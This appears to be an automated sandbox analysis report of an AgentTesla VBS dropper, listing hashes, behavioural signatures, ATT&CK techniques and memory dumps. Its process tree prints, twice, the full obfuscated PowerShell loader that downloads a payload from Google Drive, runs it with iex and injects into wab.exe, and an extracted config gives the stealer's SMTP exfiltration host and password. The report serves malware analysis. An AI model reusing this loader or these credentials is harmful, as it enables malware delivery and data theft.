agenttesla | b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293

General

Target

b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293.vbs
Size

5KB
MD5

ebdb23546bd0e7f4aee2a75909460482
SHA1

5e11c38b784b7337fc2cc6ab7100c0240476c7a2
SHA256

b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293
SHA512

b16b6573af01d2bd2314c5de1d6dd6e4cbe8080ae0b72fe9180c95f27034e69cef1b1e078162ce7783195f37050d72c9e27940b73203586cc3e1908841faf234
SSDEEP

96:QN7IU07Fzr15ZV3J0j9b0xF6Q/0Gb1plVB4CXcZQfp:QFO7hB/pJ0xb2Fn/hpLCCXcKfp

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.connectdots.my
Port:
587
Username:
[email protected]
Password:
Colony5157!
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2716 powershell.exe
7 2716 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

9 drive.google.com
4 drive.google.com
5 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 api.ipify.org
14 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2864 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1028 powershell.exe
2864 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1028 set thread context of 2864 1028 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2716 powershell.exe
1028 powershell.exe
1028 powershell.exe
2864 wab.exe
2864 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1028 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2716 powershell.exe
Token: SeDebugPrivilege 1028 powershell.exe
Token: SeDebugPrivilege 2864 wab.exe

flow	pid	process
5	2716	powershell.exe
7	2716	powershell.exe

flow	ioc
9	drive.google.com
4	drive.google.com
5	drive.google.com

flow	ioc
13	api.ipify.org
14	api.ipify.org

pid	process
2864	wab.exe

pid	process
1028	powershell.exe
2864	wab.exe

description	pid	process	target process
PID 1028 set thread context of 2864	1028	powershell.exe	wab.exe

pid	process
2716	powershell.exe
1028	powershell.exe
1028	powershell.exe
2864	wab.exe
2864	wab.exe

pid	process
1028	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	2864	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3000 wrote to memory of 2716	3000	WScript.exe	powershell.exe
PID 3000 wrote to memory of 2716	3000	WScript.exe	powershell.exe
PID 3000 wrote to memory of 2716	3000	WScript.exe	powershell.exe
PID 2716 wrote to memory of 2756	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 2756	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 2756	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 1028	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 1028	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 1028	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 1028	2716	powershell.exe	powershell.exe
PID 1028 wrote to memory of 2604	1028	powershell.exe	cmd.exe
PID 1028 wrote to memory of 2604	1028	powershell.exe	cmd.exe
PID 1028 wrote to memory of 2604	1028	powershell.exe	cmd.exe
PID 1028 wrote to memory of 2604	1028	powershell.exe	cmd.exe
PID 1028 wrote to memory of 2864	1028	powershell.exe	wab.exe
PID 1028 wrote to memory of 2864	1028	powershell.exe	wab.exe
PID 1028 wrote to memory of 2864	1028	powershell.exe	wab.exe
PID 1028 wrote to memory of 2864	1028	powershell.exe	wab.exe
PID 1028 wrote to memory of 2864	1028	powershell.exe	wab.exe
PID 1028 wrote to memory of 2864	1028	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
    3⤵
    PID:2756
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
      4⤵
      PID:2604
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Macco.Cof

Filesize
502KB

MD5
7f40a091f1c133333e814a35fe64d807

SHA1
8d278db73f3e270f33b743f358a9cfa1e3bdbe37

SHA256
5454057fe5e349e2139169937a8bb6d34b4e6e6ba83bccebaa4e701f3ccc3edb

SHA512
d930b6c0ca34da1f9cad04b5b65218bc98dde299c85627c659ae5a2f25c5321f353f1b826ee4e8bebfa32a2b7184c7a5c69c9e6a4fff42e9232f8604d511dfcb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V8YN3V4C2D4086D4GD7R.temp

Filesize
7KB

MD5
8106f7e2421b0a06a2234aa8ced56aec

SHA1
ac7931359754ce3a071fcc55edc953ec0f5f4634

SHA256
4a53f1251b57de6c2d3b9eccfc4d2444386148ed26362476e43c80bd3a33d757

SHA512
00fe214339ebc3fdb5ec6b707a0c0a06dfa20ee549d1c52334844d3c2009aedf6657d22f014288b5c29ccc9e525f0821ba955a1d1f1e3d5368dfbf65201d5916

Download Submit
memory/1028-17-0x0000000006600000-0x000000000AF09000-memory.dmp

Filesize
73.0MB

Download
memory/2716-10-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2716-8-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2716-9-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2716-4-0x000007FEF52FE000-0x000007FEF52FF000-memory.dmp

Filesize
4KB

Download
memory/2716-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/2716-7-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2716-16-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2716-5-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2716-18-0x000007FEF52FE000-0x000007FEF52FF000-memory.dmp

Filesize
4KB

Download
memory/2716-42-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-41-0x0000000000820000-0x0000000001882000-memory.dmp

Filesize
16.4MB

Download
memory/2864-43-0x0000000000820000-0x0000000000862000-memory.dmp

Filesize
264KB

Download

Analysis

Sharing